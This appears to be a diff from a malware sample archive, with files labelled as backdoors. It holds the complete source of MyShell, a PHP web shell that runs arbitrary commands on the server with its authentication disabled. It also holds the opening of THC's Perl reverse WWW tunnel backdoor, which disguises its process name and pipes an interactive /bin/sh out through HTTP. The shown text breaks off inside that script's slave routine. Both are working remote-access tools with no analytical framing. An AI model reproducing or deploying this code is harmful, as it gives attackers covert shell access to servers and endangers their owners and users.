input,select,option{
|
||||||
|
background-color: <?echo $bgInputColor ?>;
|
||||||
|
color : <?echo $outColor ?>;
|
||||||
|
border-style : none;
|
||||||
|
font-size : 10px;
|
||||||
|
}
|
||||||
|
textarea{
|
||||||
|
background-color: <?echo $bgColor ?>;
|
||||||
|
color : <?echo $outColor ?>;
|
||||||
|
border-style : none;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
|
||||||
|
<form name="shell" method="post">
|
||||||
|
Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
|
||||||
|
<input type="hidden" name=whoami value=<?echo $whoami?>>
|
||||||
|
:::::::
|
||||||
|
<?
|
||||||
|
if($editMode){
|
||||||
|
echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
echo "Current working directory: <b>\n";
|
||||||
|
$work_dir_splitted = explode("/", substr($work_dir, 1));
|
||||||
|
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
|
||||||
|
if ($work_dir_splitted[0] == "") {
|
||||||
|
$work_dir = "/"; /* Root directory. */
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
for ($i = 0; $i < count($work_dir_splitted); $i++) {
|
||||||
|
$url .= "/".$work_dir_splitted[$i];
|
||||||
|
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<br>
|
||||||
|
<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
|
||||||
|
<?
|
||||||
|
echo $shellOutput;
|
||||||
|
if ($command) {
|
||||||
|
if ($stderr) {
|
||||||
|
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$ok = system($command,$status);
|
||||||
|
if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if ($commandBk) $command = $commandBk;
|
||||||
|
?>
|
||||||
|
</textarea>
|
||||||
|
<br>
|
||||||
|
<?
|
||||||
|
if($editMode) echo"
|
||||||
|
|
||||||
|
<input type='submit' name='editSave' value=' Save '>
|
||||||
|
<input type='submit' name='editSaveExit' value=' Save and Exit '>
|
||||||
|
<input type='reset' value=' Restore original '>
|
||||||
|
<input type='submit' name='editCancel' value=' Cancel/Exit '>
|
||||||
|
<input type='hidden' name='editMode' value='true'>
|
||||||
|
<br>";
|
||||||
|
?>
|
||||||
|
<br>
|
||||||
|
Command:
|
||||||
|
<input type="text" name="command" size="80"
|
||||||
|
<? if ($command && $echoCommand) {
|
||||||
|
echo "value=`$command`";
|
||||||
|
}
|
||||||
|
?> > <input name="submit_btn" type="submit" value="Go!">
|
||||||
|
|
||||||
|
<?
|
||||||
|
if ($autoErrorTrap) echo "Auto error traping enabled";
|
||||||
|
else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
|
||||||
|
|
||||||
|
if($editMode){
|
||||||
|
echo "<input type='hidden' name='work_dir' value='$work_dir'>
|
||||||
|
<br>Save file as: <input type='text' name='file' value='$currFile'>";
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
|
||||||
|
// List of directories.
|
||||||
|
$dir_handle = opendir($work_dir);
|
||||||
|
while ($dir = readdir($dir_handle)) {
|
||||||
|
if (is_dir($dir)) {
|
||||||
|
if ($dir == ".")
|
||||||
|
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
||||||
|
elseif ($dir == "..") {
|
||||||
|
// Parent Dir. This might be server's root directory
|
||||||
|
if (strlen($work_dir) == 1) {
|
||||||
|
// work_dir is only 1 charecter - it can only be / so don't output anything
|
||||||
|
}
|
||||||
|
elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc...
|
||||||
|
echo "<option value=\"/\">Parent Directory</option>\n";
|
||||||
|
}
|
||||||
|
else { // String-manipulation to find the parent directory... Trust me - it works :-)
|
||||||
|
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if ($work_dir == "/")
|
||||||
|
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
|
||||||
|
else
|
||||||
|
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
closedir($dir_handle);
|
||||||
|
echo "</select>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
| <input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
|
||||||
|
| Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
|
||||||
|
Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
|
||||||
|
| :::::::::: <a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> ©2001 Digitart Producciones</a>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
420
PHP/Backdoor.PHP.PhpShell.n
Normal file
420
PHP/Backdoor.PHP.PhpShell.n
Normal file
@ -0,0 +1,420 @@
|
|||||||
|
<?php
|
||||||
|
/*
|
||||||
|
**************************************************************
|
||||||
|
* MyShell *
|
||||||
|
**************************************************************
|
||||||
|
$Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
|
||||||
|
|
||||||
|
An interactive PHP-page that will execute any command entered.
|
||||||
|
See the files README and INSTALL or http://www.digitart.net for
|
||||||
|
further information.
|
||||||
|
Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
|
||||||
|
based on the original program phpShell by Martin Geisler
|
||||||
|
|
||||||
|
This program is free software; you can redistribute it and/or
|
||||||
|
modify it under the terms of the GNU General Public License
|
||||||
|
as published by the Free Software Foundation; either version 2
|
||||||
|
of the License, or (at your option) any later version.
|
||||||
|
|
||||||
|
This program is distributed in the hope that it will be useful,
|
||||||
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
GNU General Public License for more details.
|
||||||
|
|
||||||
|
You can get a copy of the GNU General Public License from this
|
||||||
|
address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#$selfSecure enables built-in authenticate feature. This must be 0 in order to
|
||||||
|
#use .htaccess file or other alternative method to control access to MyShell.
|
||||||
|
#Set up your user and password using $shellUser and $shellPswd.
|
||||||
|
#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
|
||||||
|
#ACCESS TO THE SCRIPT.
|
||||||
|
|
||||||
|
$selfSecure = 0;
|
||||||
|
$shellUser = "root";
|
||||||
|
$shellPswd = "";
|
||||||
|
|
||||||
|
#$adminEmail is the email address to send warning notifications in case
|
||||||
|
#someone tries to access the script and fails to provide correct user and
|
||||||
|
#password. This only works if you have $selfSecure enabeled.
|
||||||
|
|
||||||
|
$adminEmail = "wmmoney@nc.ru";
|
||||||
|
|
||||||
|
#$fromEmail is the email address warning messages are sended from.
|
||||||
|
#This defaults to the server admin, but you can change
|
||||||
|
#to any address you want i.e.: noreplay@yourdomain.com
|
||||||
|
#This only works if you have $selfSecure enabeled.
|
||||||
|
|
||||||
|
$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"];
|
||||||
|
|
||||||
|
#$dirLimit is the top directory allowed to change when using cd command
|
||||||
|
#or the form selector. Any attempt to change to a directory up to this
|
||||||
|
#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
|
||||||
|
#It is a good practice to set it to $DOCUMENT_ROOT using:
|
||||||
|
#$dirLimit = $DOCUMENT_ROOT;
|
||||||
|
#If you want to have access to all server directories leave it blank.
|
||||||
|
#WARNING: Althought a user won't be able to snoop on directories above
|
||||||
|
#this level using MyShell, he/she will still be able to excecute
|
||||||
|
#commands on any directory where Webserver has permission,
|
||||||
|
#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
|
||||||
|
|
||||||
|
$dirLimit = "";
|
||||||
|
|
||||||
|
#$autoErrorTrap Enable automatic error traping if command returns error.
|
||||||
|
#Bear in mind that MyShell executes the command a second time in order to
|
||||||
|
#trap the stderr. This shouldn't be a problem in most cases.
|
||||||
|
#If you turn it off, you'll have to select either to trap stderr or not for
|
||||||
|
#every command you excecute.
|
||||||
|
|
||||||
|
$autoErrorTrap = 1;
|
||||||
|
|
||||||
|
#$voidCommands is the list of commands that MyShell won't run by any means.
|
||||||
|
#It defaults to known problematic commands from a web interface like pico,
|
||||||
|
#top, xterm but also it can include specific commands you don't want to
|
||||||
|
#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
|
||||||
|
|
||||||
|
$voidCommands = array("top","xterm","su","vi","pico","netscape");
|
||||||
|
|
||||||
|
#$TexEd Built-in Text Editor prefered name. This is the command you'll use
|
||||||
|
#to invoke MyShell's built in text editor.
|
||||||
|
# If you are used to type pico or vi for your fav text editor,
|
||||||
|
#change this to your please. i.e.:
|
||||||
|
# $TexEd = "pico";
|
||||||
|
#will allow you to type 'pico config.php' to edit the file config.php
|
||||||
|
#MyShell's text editor do not support usual commands in pico, vi etc.
|
||||||
|
#Don't forget to take off this command from the $voidCommands list
|
||||||
|
$TexEd = "edit";
|
||||||
|
|
||||||
|
#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
|
||||||
|
#is usefull when you have to edit files with long lines, i.e.: in php code
|
||||||
|
#files, because otherwise it is no easy to distinguish a real new line (CR)
|
||||||
|
#from a wraped one. If you prefer to stick to the default wraped mode of
|
||||||
|
#TEXTAREA just leave this blank i.e.: $editWrap="".
|
||||||
|
$editWrap ="wrap='OFF'";
|
||||||
|
|
||||||
|
#Cosmetic defaults.
|
||||||
|
|
||||||
|
$termCols = 80; //Default width of the output text area
|
||||||
|
$termRows = 20; //Default heght of the output text area
|
||||||
|
$bgColor = "#000000"; //background color
|
||||||
|
$bgInputColor = "#333333"; //color of the input field
|
||||||
|
$outColor = "#00BB00"; //color of the text output from the server
|
||||||
|
$textColor = "#009900"; //color of the hard texts of the terminal
|
||||||
|
$linkColor = "#00FF00"; //color of the links
|
||||||
|
|
||||||
|
/************** No customize needed from this point *************/
|
||||||
|
|
||||||
|
$MyShellVersion = "MyShell 1.1.0 build 20010923";
|
||||||
|
if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
|
||||||
|
if($selfSecure){
|
||||||
|
if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
|
||||||
|
Header('WWW-Authenticate: Basic realm="MyShell"');
|
||||||
|
Header('HTTP/1.0 401 Unauthorized');
|
||||||
|
echo "<html>
|
||||||
|
<head>
|
||||||
|
<title>$MyShellVersion - Access Denied</title>
|
||||||
|
</head>
|
||||||
|
<h1>Access denied</h1>
|
||||||
|
A warning message have been sended to the administrator
|
||||||
|
<hr>
|
||||||
|
<em>$MyShellVersion</em>";
|
||||||
|
if(isset($PHP_AUTH_USER)){
|
||||||
|
$warnMsg ="
|
||||||
|
This is $MyShellVersion
|
||||||
|
installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
|
||||||
|
just to let you know that somebody tryed to access
|
||||||
|
the script using wrong username or password:
|
||||||
|
|
||||||
|
Date: ".date("Y-m-d H:i:s")."
|
||||||
|
IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
|
||||||
|
User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
|
||||||
|
username used: $PHP_AUTH_USER
|
||||||
|
password used: $PHP_AUTH_PW
|
||||||
|
|
||||||
|
If this is not the first time it happens,
|
||||||
|
please consider either to remove MyShell
|
||||||
|
from your system or change it's name or
|
||||||
|
directory location on your server.
|
||||||
|
|
||||||
|
Regards
|
||||||
|
The MyShell dev team
|
||||||
|
";
|
||||||
|
mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
|
||||||
|
"From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
|
||||||
|
}
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
//Function that validate directories
|
||||||
|
function validate_dir($dir){
|
||||||
|
GLOBAL $dirLimit;
|
||||||
|
if($dirLimit){
|
||||||
|
$cdPos = strpos($dir,$dirLimit);
|
||||||
|
if ((string)$cdPos == "") {
|
||||||
|
$dir = $dirLimit;
|
||||||
|
$GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return $dir;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set working directory.
|
||||||
|
if (isset($work_dir)) {
|
||||||
|
//A workdir has been asked for - we chdir to that dir.
|
||||||
|
$work_dir = validate_dir($work_dir);
|
||||||
|
@chdir($work_dir) or
|
||||||
|
($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
|
||||||
|
$work_dir = exec("pwd");
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
// No work_dir - we chdir to $DOCUMENT_ROOT
|
||||||
|
$work_dir = validate_dir($DOCUMENT_ROOT);
|
||||||
|
chdir($work_dir);
|
||||||
|
$work_dir = exec("pwd");
|
||||||
|
}
|
||||||
|
|
||||||
|
//Now we handle files if we are in Edit Mode
|
||||||
|
if($editMode && ($command||$editCancel))$editMode=false;
|
||||||
|
if($editMode){
|
||||||
|
if($editSave ||$editSaveExit){
|
||||||
|
if(function_exists(ini_set))ini_set("track_errors","1");
|
||||||
|
if($fp=@fopen($file,"w")){
|
||||||
|
if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
|
||||||
|
fputs($fp,$shellOut);
|
||||||
|
fclose($fp);
|
||||||
|
$command = $TexEd." ".$file;
|
||||||
|
if($editSaveExit) {
|
||||||
|
$command="";
|
||||||
|
$shellOutput="MyShell: $file: saved";
|
||||||
|
$editMode=false;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$command="";
|
||||||
|
$shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
|
||||||
|
$errorSave=true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
//Separate command(s) and arguments to analize first command
|
||||||
|
$input=explode(" ",$command);
|
||||||
|
|
||||||
|
while (list ($key, $val) = each ($voidCommands)) {
|
||||||
|
if($input[0]==$val){
|
||||||
|
$voidCmd = $input[0];
|
||||||
|
$input[0]="void";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
switch($input[0]){
|
||||||
|
case "cd":
|
||||||
|
$path=$input[1];
|
||||||
|
if ($path==".."){
|
||||||
|
$work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
|
||||||
|
if ($work_dir == "") $work_dir = "/";
|
||||||
|
}
|
||||||
|
elseif (substr($path,0,1)=="/")$work_dir=$path;
|
||||||
|
else $work_dir=$work_dir."/".$path;
|
||||||
|
$work_dir = validate_dir($work_dir);
|
||||||
|
@chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
|
||||||
|
$work_dir = exec("pwd");
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
break;
|
||||||
|
case "man":
|
||||||
|
exec($command,$man);
|
||||||
|
if($man){
|
||||||
|
$codes = ".".chr(8);
|
||||||
|
$manual = implode("\n",$man);
|
||||||
|
$shellOutput = ereg_replace($codes,"",$manual);
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
else $stderr=1;
|
||||||
|
break;
|
||||||
|
case "cat":
|
||||||
|
exec($command,$cat);
|
||||||
|
if($cat){
|
||||||
|
$text = implode("\n",$cat);
|
||||||
|
$shellOutput = htmlspecialchars($text);
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
else $stderr=1;
|
||||||
|
break;
|
||||||
|
case "more":
|
||||||
|
exec($command,$cat);
|
||||||
|
if($cat){
|
||||||
|
$text = implode("\n",$cat);
|
||||||
|
$shellOutput = htmlspecialchars($text);
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
else $stderr=1;
|
||||||
|
break;
|
||||||
|
case $TexEd:
|
||||||
|
if(file_exists($input[1])){
|
||||||
|
exec("cat ".$input[1],$cat);
|
||||||
|
$text = implode("\n",$cat);
|
||||||
|
$shellOutput = htmlspecialchars($text);
|
||||||
|
$fileOwner = posix_getpwuid(fileowner($input[1]));
|
||||||
|
$filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
|
||||||
|
$fileEditInfo = " ::::::: Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
|
||||||
|
}
|
||||||
|
else $fileEditInfo = " ::::::: <font color=$linkColor>NEW FILE</font>";
|
||||||
|
$currFile = $input[1];
|
||||||
|
$editMode = true;
|
||||||
|
$command = "";
|
||||||
|
break;
|
||||||
|
case "void":
|
||||||
|
$shellOutput = "MyShell: $voidCmd: void command for MyShell";
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
|
||||||
|
//Now we prepare the webpage
|
||||||
|
if(!$oCols)$oCols=$termCols;
|
||||||
|
if(!$oRows)$oRows=$termRows;
|
||||||
|
if($editMode)$focus="shellOut.focus()";
|
||||||
|
else $focus="command.select()";
|
||||||
|
//WhoamI
|
||||||
|
if(!$whoami)$whoami=exec("whoami");
|
||||||
|
?>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title><?echo $MyShellVersion?></title>
|
||||||
|
<style>
|
||||||
|
body{
|
||||||
|
background-color: <?echo $bgColor ?>;
|
||||||
|
font-family : sans-serif;
|
||||||
|
font-size : 10px;
|
||||||
|
scrollbar-face-color: #666666;
|
||||||
|
scrollbar-shadow-color: <?echo $bgColor ?>;
|
||||||
|
scrollbar-highlight-color: #999999;
|
||||||
|
scrollbar-3dlight-color: <?echo $bgColor ?>;
|
||||||
|
scrollbar-darkshadow-color: <?echo $bgColor ?>;
|
||||||
|
scrollbar-track-color: <?echo $bgInputColor ?>;
|
||||||
|
scrollbar-arrow-color: <?echo $textColor ?>;
|
||||||
|
}
|
||||||
|
input,select,option{
|
||||||
|
background-color: <?echo $bgInputColor ?>;
|
||||||
|
color : <?echo $outColor ?>;
|
||||||
|
border-style : none;
|
||||||
|
font-size : 10px;
|
||||||
|
}
|
||||||
|
textarea{
|
||||||
|
background-color: <?echo $bgColor ?>;
|
||||||
|
color : <?echo $outColor ?>;
|
||||||
|
border-style : none;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
|
||||||
|
<form name="shell" method="post">
|
||||||
|
Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
|
||||||
|
<input type="hidden" name=whoami value=<?echo $whoami?>>
|
||||||
|
:::::::
|
||||||
|
<?
|
||||||
|
if($editMode){
|
||||||
|
echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
echo "Current working directory: <b>\n";
|
||||||
|
$work_dir_splitted = explode("/", substr($work_dir, 1));
|
||||||
|
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
|
||||||
|
if ($work_dir_splitted[0] == "") {
|
||||||
|
$work_dir = "/"; /* Root directory. */
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
for ($i = 0; $i < count($work_dir_splitted); $i++) {
|
||||||
|
$url .= "/".$work_dir_splitted[$i];
|
||||||
|
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<br>
|
||||||
|
<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
|
||||||
|
<?
|
||||||
|
echo $shellOutput;
|
||||||
|
if ($command) {
|
||||||
|
if ($stderr) {
|
||||||
|
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$ok = system($command,$status);
|
||||||
|
if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if ($commandBk) $command = $commandBk;
|
||||||
|
?>
|
||||||
|
</textarea>
|
||||||
|
<br>
|
||||||
|
<?
|
||||||
|
if($editMode) echo"
|
||||||
|
|
||||||
|
<input type='submit' name='editSave' value=' Save '>
|
||||||
|
<input type='submit' name='editSaveExit' value=' Save and Exit '>
|
||||||
|
<input type='reset' value=' Restore original '>
|
||||||
|
<input type='submit' name='editCancel' value=' Cancel/Exit '>
|
||||||
|
<input type='hidden' name='editMode' value='true'>
|
||||||
|
<br>";
|
||||||
|
?>
|
||||||
|
<br>
|
||||||
|
Command:
|
||||||
|
<input type="text" name="command" size="80"
|
||||||
|
<? if ($command && $echoCommand) {
|
||||||
|
echo "value=`$command`";
|
||||||
|
}
|
||||||
|
?> > <input name="submit_btn" type="submit" value="Go!">
|
||||||
|
|
||||||
|
<?
|
||||||
|
if ($autoErrorTrap) echo "Auto error traping enabled";
|
||||||
|
else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
|
||||||
|
|
||||||
|
if($editMode){
|
||||||
|
echo "<input type='hidden' name='work_dir' value='$work_dir'>
|
||||||
|
<br>Save file as: <input type='text' name='file' value='$currFile'>";
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
|
||||||
|
// List of directories.
|
||||||
|
$dir_handle = opendir($work_dir);
|
||||||
|
while ($dir = readdir($dir_handle)) {
|
||||||
|
if (is_dir($dir)) {
|
||||||
|
if ($dir == ".")
|
||||||
|
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
||||||
|
elseif ($dir == "..") {
|
||||||
|
// Parent Dir. This might be server's root directory
|
||||||
|
if (strlen($work_dir) == 1) {
|
||||||
|
// work_dir is only 1 charecter - it can only be / so don't output anything
|
||||||
|
}
|
||||||
|
elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc...
|
||||||
|
echo "<option value=\"/\">Parent Directory</option>\n";
|
||||||
|
}
|
||||||
|
else { // String-manipulation to find the parent directory... Trust me - it works :-)
|
||||||
|
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if ($work_dir == "/")
|
||||||
|
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
|
||||||
|
else
|
||||||
|
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
closedir($dir_handle);
|
||||||
|
echo "</select>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
| <input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
|
||||||
|
| Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
|
||||||
|
Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
|
||||||
|
| :::::::::: <a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> ©2001 Digitart Producciones</a>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
368
PHP/Backdoor.PHP.ReverseTunnel.20
Normal file
368
PHP/Backdoor.PHP.ReverseTunnel.20
Normal file
@ -0,0 +1,368 @@
|
|||||||
|
#!/usr/bin/perl
|
||||||
|
#
|
||||||
|
# Reverse-WWW-Tunnel-Backdoor v2.0
|
||||||
|
# (c) 1998-2002 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
|
||||||
|
# Check out http://www.thehackerschoice.com
|
||||||
|
# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
|
||||||
|
# available at the website above in the "Articles" section.
|
||||||
|
#
|
||||||
|
|
||||||
|
# Greets to all THC, TESO, ADM and #bluebox guys
|
||||||
|
|
||||||
|
# verified to work on Linux, Solaris, AIX and OpenBSD
|
||||||
|
|
||||||
|
# BUGS: some Solaris machines: select(3) is broken, won't work there
|
||||||
|
# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
|
||||||
|
# we can't make proper receive checks here. Workaround implemented.
|
||||||
|
#
|
||||||
|
# HISTORY:
|
||||||
|
# v2.0: HTTP 1.0 protocol compliance (finally ;-)
|
||||||
|
# v1.6: included www-proxy authentication ;-))
|
||||||
|
# v1.4: porting to various unix types (and I thought perl'd be portable...)
|
||||||
|
# v1.3: initial public release of the paper including this tool
|
||||||
|
|
||||||
|
#
|
||||||
|
# GENERAL CONFIG (except for $MASK, everything must be the same
|
||||||
|
# for MASTER and SLAVE is this section!)
|
||||||
|
#
|
||||||
|
$MODE="POST"; # GET or POST
|
||||||
|
$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi.
|
||||||
|
$MASK="vi"; # for masking the program's process name
|
||||||
|
$PASSWORD="THC"; # anything, nothing you have to rememeber
|
||||||
|
# (not a real "password" anyway)
|
||||||
|
#
|
||||||
|
# MASTER CONFIG (specific for the MASTER)
|
||||||
|
#
|
||||||
|
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
|
||||||
|
$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
|
||||||
|
|
||||||
|
#
|
||||||
|
# SLAVE CONFIG (specific for the SLAVE)
|
||||||
|
#
|
||||||
|
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
|
||||||
|
$DELAY="3"; # time to wait for output after your command(s)
|
||||||
|
#$TIME="14:39"; # time when to connect to the master (unset if now)
|
||||||
|
#$DAILY="yes"; # tries to connect once daily if set with something
|
||||||
|
#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
|
||||||
|
#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
|
||||||
|
#$PROXY_USER="user"; # username for proxy authentication
|
||||||
|
#$PROXY_PASSWORD="pass";# password for proxy authentication
|
||||||
|
#$DEBUG="yes"; # for debugging purpose, turn off when in production
|
||||||
|
$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
|
||||||
|
|
||||||
|
# END OF CONFIG # nothing for you to do after this point #
|
||||||
|
|
||||||
|
################## BEGIN MAIN CODE ##################
|
||||||
|
|
||||||
|
require 5.002;
|
||||||
|
use Socket;
|
||||||
|
|
||||||
|
$|=1; # next line changes our process name
|
||||||
|
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
|
||||||
|
undef $DAILY if (! $TIME);
|
||||||
|
if ( !($PROXY) || !($PROXY_PORT) ) {
|
||||||
|
undef $PROXY;
|
||||||
|
undef $PROXY_PORT;
|
||||||
|
}
|
||||||
|
$protocol = getprotobyname('tcp');
|
||||||
|
|
||||||
|
if ($ARGV[0] ne "slave" && $ARGV[0] ne "daemon" && $ARGV[0] ne "master" && $ARGV[1] eq "") {
|
||||||
|
print STDOUT "Proof-of-Concept Program for the paper \"Placing Backdoors through Firewalls\"\navailable at http://www.thehackerschoice.com in the \"Articles\" section.\n";
|
||||||
|
print STDOUT "Commandline options for rwwwshell:\n\tmaster\t- master mode\n\tslave\t- slave mode\n";
|
||||||
|
exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($ARGV[0] eq "slave") {
|
||||||
|
print STDOUT "starting in slave mode\n";
|
||||||
|
$SLAVE_MODE = "yeah";
|
||||||
|
}
|
||||||
|
|
||||||
|
# check for a correct mode
|
||||||
|
if ($MODE ne "GET" && $MODE ne "POST") {
|
||||||
|
print STDOUT "Error: MODE must either be GET or POST, re-edit this perl config\n";
|
||||||
|
exit(-1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (! $SLAVE_MODE) {
|
||||||
|
&master;
|
||||||
|
} else {
|
||||||
|
&slave;
|
||||||
|
}
|
||||||
|
# END OF MAIN FUNCTION
|
||||||
|
|
||||||
|
############### SLAVE FUNCTION ###############
|
||||||
|
|
||||||
|
sub slave {
|
||||||
|
$pid = 0;
|
||||||
|
$PROXY_SUFFIX = "Host: " . $SERVER . "\r\nUser-Agent: Mozilla/4.0\r\nAccept: text/html, text/plain, image/jpeg, image/*;\r\nAccept-Language: en\r\n";
